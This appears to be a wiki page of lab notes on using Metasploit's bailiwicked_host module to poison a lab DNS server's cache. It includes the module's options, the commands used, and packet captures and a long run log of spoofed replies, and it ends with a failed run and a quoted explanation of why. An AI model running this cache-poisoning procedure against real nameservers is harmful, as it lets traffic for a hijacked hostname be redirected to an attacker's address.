23:55:28.366923 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.367362 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.367799 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.368372 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.368807 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.369263 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.369698 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.370140 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.370571 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.371137 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.371576 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.372018 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.372453 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.372889 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.373348 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.374282 IP morpheus.19248 > 10.0.0.27.domain: 32177+ A? oTdkBDSfM4iZG6.yahoo.com. (42) | |||
23:55:28.375022 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) | |||
23:55:28.375462 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) | |||
23:55:28.375897 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) | |||
23:55:28.376339 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) | |||
23:55:28.376772 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) | |||
23:55:28.377226 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105) | |||
23:55:28.377782 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (105) | |||
23:55:28.378224 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (105) | |||
</pre> | |||
===Conclusions?=== | |||
Reasons for failure are unclear at this point. | |||
==DNS Exploit: bailiwicked host== | |||
In plain English, this attack allows you to add your own host entry to a DNS nameserver's list of hostnames. This is done by confusing the nameserver by sending responses to fake DNS queries. | |||
We can use this exploit by running: | |||
<pre> | |||
msf > use auxiliary/spoof/dns/bailiwicked_host | |||
</pre> | |||
More information: | |||
<pre> | |||
This exploit attacks a fairly ubiquitous flaw in DNS implementations | |||
which Dan Kaminsky found and disclosed ~Jul 2008. This exploit | |||
caches a single malicious host entry into the target nameserver by | |||
sending random hostname queries to the target DNS server coupled | |||
with spoofed replies to those queries from the authoritative | |||
nameservers for that domain. Eventually, a guessed ID will match, | |||
the spoofed packet will get accepted, and due to the additional | |||
hostname entry being within bailiwick constraints of the original | |||
request the malicious host entry will get cached. | |||
</pre> | |||
===Setting options for bailiwicked host exploit=== | |||
Here are the options, after setting some things: | |||
<pre> | |||
msf > show info | |||
Name: DNS BailiWicked Host Attack | |||
Module: auxiliary/spoof/dns/bailiwicked_host | |||
License: Metasploit Framework License (BSD) | |||
Rank: Normal | |||
Disclosed: 2008-07-21 | |||
Provided by: | |||
I)ruid <druid@caughq.org> | |||
hdm <x@hdm.io> | |||
Basic options: | |||
Name Current Setting Required Description | |||
---- --------------- -------- ----------- | |||
HOSTNAME example.com yes Hostname to hijack | |||
INTERFACE no The name of the interface | |||
NEWADDR 45.33.40.53 yes New address for hostname | |||
RECONS 208.67.222.222 yes The nameserver used for reconnaissance | |||
RHOST 10.0.0.27 yes The target address | |||
SNAPLEN 65535 yes The number of bytes to capture | |||
SRCADDR Real yes The source address to use for sending the queries (Accepted: Real, Random) | |||
SRCPORT 0 yes The target server's source query port (0 for automatic) | |||
TIMEOUT 500 yes The number of seconds to wait for new data | |||
TTL 47695 yes The TTL for the malicious host entry | |||
XIDS 0 yes The number of XIDs to try for each query (0 for automatic) | |||
</pre> | |||
===Failure to check exploit=== | |||
No die with the check, again: | |||
<pre> | |||
msf auxiliary(bailiwicked_host) > check | |||
[*] 10.0.0.27 - Cannot reliably check exploitability. | |||
</pre> | |||
===Before=== | |||
Before the attack, using dig: | |||
<pre> | |||
msf auxiliary(bailiwicked_host) > dig +short -t ns example.com @10.0.0.27 | |||
[*] exec: dig +short -t ns example.com @10.0.0.27 | |||
a.iana-servers.net. | |||
b.iana-servers.net. | |||
</pre> | |||
===Executing=== | |||
Execute attack with a run: | |||
<pre> | |||
msf auxiliary(bailiwicked_host) > run | |||
</pre> | |||
Nope. | |||
{{Scroll box|<pre> | |||
msf auxiliary(bailiwicked_host) > run | |||
[*] Targeting nameserver 10.0.0.27 for injection of example.com. as 45.33.40.53 | |||
[*] Querying recon nameserver for com.'s nameservers... | |||
[*] Got an NS record: com. 166090 IN NS e.gtld-servers.net. | |||
[*] Querying recon nameserver for address of e.gtld-servers.net.... | |||
[*] Got an A record: e.gtld-servers.net. 800 IN A 192.12.94.30 | |||
[*] Checking Authoritativeness: Querying 192.12.94.30 for com.... | |||
[*] e.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS j.gtld-servers.net. | |||
[*] Querying recon nameserver for address of j.gtld-servers.net.... | |||
[*] Got an A record: j.gtld-servers.net. 18798 IN A 192.48.79.30 | |||
[*] Checking Authoritativeness: Querying 192.48.79.30 for com.... | |||
[*] j.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS f.gtld-servers.net. | |||
[*] Querying recon nameserver for address of f.gtld-servers.net.... | |||
[*] Got an A record: f.gtld-servers.net. 5329 IN A 192.35.51.30 | |||
[*] Checking Authoritativeness: Querying 192.35.51.30 for com.... | |||
[*] f.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS c.gtld-servers.net. | |||
[*] Querying recon nameserver for address of c.gtld-servers.net.... | |||
[*] Got an A record: c.gtld-servers.net. 29013 IN A 192.26.92.30 | |||
[*] Checking Authoritativeness: Querying 192.26.92.30 for com.... | |||
[*] c.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS a.gtld-servers.net. | |||
[*] Querying recon nameserver for address of a.gtld-servers.net.... | |||
[*] Got an A record: a.gtld-servers.net. 79308 IN A 192.5.6.30 | |||
[*] Checking Authoritativeness: Querying 192.5.6.30 for com.... | |||
[*] a.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS k.gtld-servers.net. | |||
[*] Querying recon nameserver for address of k.gtld-servers.net.... | |||
[*] Got an A record: k.gtld-servers.net. 11880 IN A 192.52.178.30 | |||
[*] Checking Authoritativeness: Querying 192.52.178.30 for com.... | |||
[*] k.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS h.gtld-servers.net. | |||
[*] Querying recon nameserver for address of h.gtld-servers.net.... | |||
[*] Got an A record: h.gtld-servers.net. 82036 IN A 192.54.112.30 | |||
[*] Checking Authoritativeness: Querying 192.54.112.30 for com.... | |||
[*] h.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS g.gtld-servers.net. | |||
[*] Querying recon nameserver for address of g.gtld-servers.net.... | |||
[*] Got an A record: g.gtld-servers.net. 78272 IN A 192.42.93.30 | |||
[*] Checking Authoritativeness: Querying 192.42.93.30 for com.... | |||
[*] g.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS m.gtld-servers.net. | |||
[*] Querying recon nameserver for address of m.gtld-servers.net.... | |||
[*] Got an A record: m.gtld-servers.net. 26577 IN A 192.55.83.30 | |||
[*] Checking Authoritativeness: Querying 192.55.83.30 for com.... | |||
[*] m.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS l.gtld-servers.net. | |||
[*] Querying recon nameserver for address of l.gtld-servers.net.... | |||
[*] Got an A record: l.gtld-servers.net. 15180 IN A 192.41.162.30 | |||
[*] Checking Authoritativeness: Querying 192.41.162.30 for com.... | |||
[*] l.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS d.gtld-servers.net. | |||
[*] Querying recon nameserver for address of d.gtld-servers.net.... | |||
[*] Got an A record: d.gtld-servers.net. 19773 IN A 192.31.80.30 | |||
[*] Checking Authoritativeness: Querying 192.31.80.30 for com.... | |||
[*] d.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS i.gtld-servers.net. | |||
[*] Querying recon nameserver for address of i.gtld-servers.net.... | |||
[*] Got an A record: i.gtld-servers.net. 22833 IN A 192.43.172.30 | |||
[*] Checking Authoritativeness: Querying 192.43.172.30 for com.... | |||
[*] i.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: com. 166090 IN NS b.gtld-servers.net. | |||
[*] Querying recon nameserver for address of b.gtld-servers.net.... | |||
[*] Got an A record: b.gtld-servers.net. 45159 IN A 192.33.14.30 | |||
[*] Checking Authoritativeness: Querying 192.33.14.30 for com.... | |||
[*] b.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as | |||
[*] Calculating the number of spoofed replies to send per query... | |||
[*] race calc: 100 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 2/106/17 | |||
[*] Sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Attempting to inject a poison record for example.com. into 10.0.0.27:0... | |||
[*] Sent 1000 queries and 13000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 3/87/18 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 2000 queries and 39000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.02 | min/max/avg replies: 5/78/11 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 3000 queries and 52000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.05 | min/max/avg replies: 7/85/23 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 4000 queries and 78000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 1/80/18 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 5000 queries and 104000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 4/88/19 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 6000 queries and 130000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/84/18 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 7000 queries and 156000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/78/15 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 8000 queries and 169000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.05 | min/max/avg replies: 6/82/24 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 9000 queries and 195000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.03 | min/max/avg replies: 3/91/15 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 10000 queries and 208000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 1/75/18 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 11000 queries and 234000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.21/0.04 | min/max/avg replies: 1/93/19 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 12000 queries and 260000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 6/82/13 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 13000 queries and 273000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/78/20 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 14000 queries and 299000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.03 | min/max/avg replies: 7/95/18 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 15000 queries and 325000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.21/0.04 | min/max/avg replies: 6/100/18 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 16000 queries and 351000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/77/18 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 17000 queries and 377000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 6/84/21 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 18000 queries and 403000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/74/14 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 19000 queries and 416000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.05 | min/max/avg replies: 3/83/23 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 20000 queries and 442000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.03 | min/max/avg replies: 3/88/16 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 21000 queries and 455000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/80/21 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 22000 queries and 481000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.57/0.06 | min/max/avg replies: 5/293/28 | |||
[*] Now sending 3 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 23000 queries and 520000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.03 | min/max/avg replies: 6/70/12 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 24000 queries and 533000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/85/23 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 25000 queries and 559000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.02 | min/max/avg replies: 4/77/12 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 26000 queries and 572000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.21/0.04 | min/max/avg replies: 6/91/22 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 27000 queries and 598000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 2/78/16 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 28000 queries and 611000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/80/19 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 29000 queries and 637000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.11/0.02 | min/max/avg replies: 5/50/10 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 30000 queries and 650000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 6/82/21 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 31000 queries and 676000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 6/78/15 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 32000 queries and 689000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/84/21 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 33000 queries and 715000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.03/0.2/0.07 | min/max/avg replies: 14/93/33 | |||
[*] Now sending 3 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 34000 queries and 754000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/81/19 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 35000 queries and 780000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 5/75/19 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 36000 queries and 806000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.02 | min/max/avg replies: 5/79/11 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 37000 queries and 819000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.23/0.05 | min/max/avg replies: 6/92/24 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 38000 queries and 845000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.24/0.04 | min/max/avg replies: 2/105/21 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 39000 queries and 871000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.03 | min/max/avg replies: 5/84/15 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 40000 queries and 884000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.05 | min/max/avg replies: 6/88/23 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 41000 queries and 910000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 1/92/14 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 42000 queries and 923000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 6/85/22 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 43000 queries and 949000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 2/78/16 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 44000 queries and 962000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.22/0.04 | min/max/avg replies: 5/76/17 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 45000 queries and 975000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 5/83/19 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 46000 queries and 1001000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 5/80/17 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 47000 queries and 1014000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 6/92/17 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 48000 queries and 1027000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/82/19 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 49000 queries and 1053000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 6/85/15 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 50000 queries and 1066000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 5/81/20 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 51000 queries and 1092000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/80/20 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 52000 queries and 1118000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.02 | min/max/avg replies: 1/80/12 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 53000 queries and 1131000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.05 | min/max/avg replies: 3/86/23 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 54000 queries and 1157000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/85/18 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 55000 queries and 1183000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.03 | min/max/avg replies: 4/94/14 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 56000 queries and 1196000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 5/85/20 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 57000 queries and 1222000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/80/17 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 58000 queries and 1235000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 6/87/21 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 59000 queries and 1261000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/81/14 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 60000 queries and 1274000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.05 | min/max/avg replies: 6/92/22 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 61000 queries and 1300000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.21/0.03 | min/max/avg replies: 5/91/14 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 62000 queries and 1313000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 5/87/21 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 63000 queries and 1339000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 0/78/15 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 64000 queries and 1352000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 5/94/20 | |||
[*] Now sending 2 spoofed replies from each nameserver (13) for each query | |||
[*] Sent 65000 queries and 1378000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/79/15 | |||
[*] Now sending 1 spoofed replies from each nameserver (13) for each query | |||
^C[-] Auxiliary interrupted by the console user | |||
[*] Auxiliary module execution completed | |||
msf auxiliary(bailiwicked_host) > | |||
</pre> | |||
}} | |||
=Reason for Failure= | |||
{{Quote| | |||
On another note, before using Metasploit to test your DNS infrastructure to see if it is exploitable, it is important to know whether your local network allows spoofed packets out. Many firewalls can be configured to drop spoofed packets from internal systems, and even my little LinkSys router does this. Because there is no mechanism in Metasploit currently (as far as I know) to detect whether your local network filters spoofed packets (and building such a mechanism would be tricky for various technical reasons), an incorrect assumption can result in a cache poisoning attack that has no possibility of succeeding but that also generates thousands of DNS queries at the same time. | |||
- https://cipherdyne.org/blog/2008/07/metasploit-dns-cache-poisoning-and-iptables-countermeasures.html | |||
}} | |||
=Flags= | |||
